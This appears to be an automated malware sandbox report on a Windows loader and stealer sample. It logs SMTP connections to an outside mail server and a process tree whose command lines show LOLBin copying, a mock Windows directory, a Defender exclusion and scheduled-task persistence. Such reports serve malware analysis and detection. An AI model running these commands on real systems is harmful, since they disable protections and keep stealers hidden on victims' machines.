                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.351233959 CET5875008951.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:51 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.351413965 CET50089587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.758491993 CET5875008951.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.758690119 CET50089587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.163511038 CET5875008951.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.669365883 CET5875009251.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:53 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.669509888 CET50092587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.077558994 CET5875009251.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.077864885 CET50092587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.485847950 CET5875009251.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.403992891 CET5875009651.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:57 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.404254913 CET50096587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.807035923 CET5875009651.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.807301998 CET50096587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.210387945 CET5875009651.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:16.356379032 CET5875011551.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:16 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:16.356547117 CET50115587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:16.766685009 CET5875011551.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:16.766840935 CET50115587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:17.177259922 CET5875011551.195.88.199192.168.2.10220 TLS go ahead
Target ID: 0
Start time: 02:12:07
Start date: 26/11/2024
Path: C:\Users\user\Desktop\C6dAUcOA6M.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\C6dAUcOA6M.exe"
Imagebase: 0x400000
File size: 1'226'752 bytes
MD5 hash: 53F0663219E6091CECD600C59389711F
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:19
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xd70000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:19
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:19
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xc40000
                                                                                                                                                                                                                                                                                                                                                    File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:20
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xc40000
                                                                                                                                                                                                                                                                                                                                                    File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:20
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:02:12:21
Start date:26/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
Imagebase:0xc40000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:02:12:21
Start date:26/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:02:12:21
Start date:26/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Imagebase:0xee0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:02:12:21
Start date:26/11/2024
Path:C:\Users\Public\Libraries\aymtmquJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:02:12:22
Start date:26/11/2024
Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Imagebase:0x400000
File size:1'425'408 bytes
MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1781418766.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:14
Start time:02:12:23
Start date:26/11/2024
Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:0x90000
File size:70'656 bytes
MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:23
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:23
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\xpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x390000
                                                                                                                                                                                                                                                                                                                                                    File size:18'944 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:24
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                    File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:E471E4037B76A28D3D82E42538FC3807
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:25
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x3a0000
                                                                                                                                                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:25
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:25
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

Target ID: 21
Start time: 02:12:25
Start date: 26/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff620390000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 02:12:28
Start date: 26/11/2024
Path: C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 138'056 bytes
MD5 hash: BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 23
Start time: 02:12:28
Start date: 26/11/2024
Path: C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 174'408 bytes
MD5 hash: E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 24
Start time: 02:12:28
Start date: 26/11/2024
Path: C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 154'952 bytes
MD5 hash: 2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 25
Start time: 02:12:28
Start date: 26/11/2024
Path: C:\Windows\System32\AppVClient.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\AppVClient.exe
Imagebase: 0x140000000
File size: 1'348'608 bytes
MD5 hash: 907DB1B5C7DE81B95CC62375B2502582
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 02:12:32
Start date: 26/11/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff6616b0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 02:12:35
Start date: 26/11/2024
Path: C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\fxssvc.exe
Imagebase: 0x140000000
File size: 1'242'624 bytes
MD5 hash: BB9DE1AD24CC587EB4D9FB9CF61AE13B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 02:12:36
Start date: 26/11/2024
Path: C:\Users\Public\Libraries\Juqmtmya.PIF
Wow64 process (32bit): true
Commandline: "C:\Users\Public\Libraries\Juqmtmya.PIF"
Imagebase: 0x400000
File size: 1'226'752 bytes
MD5 hash: 53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:38
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:39
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000003.1632645650.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000003.1630416908.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1845358079.0000000003E75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.1832128642.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1852623141.0000000005010000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:40
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
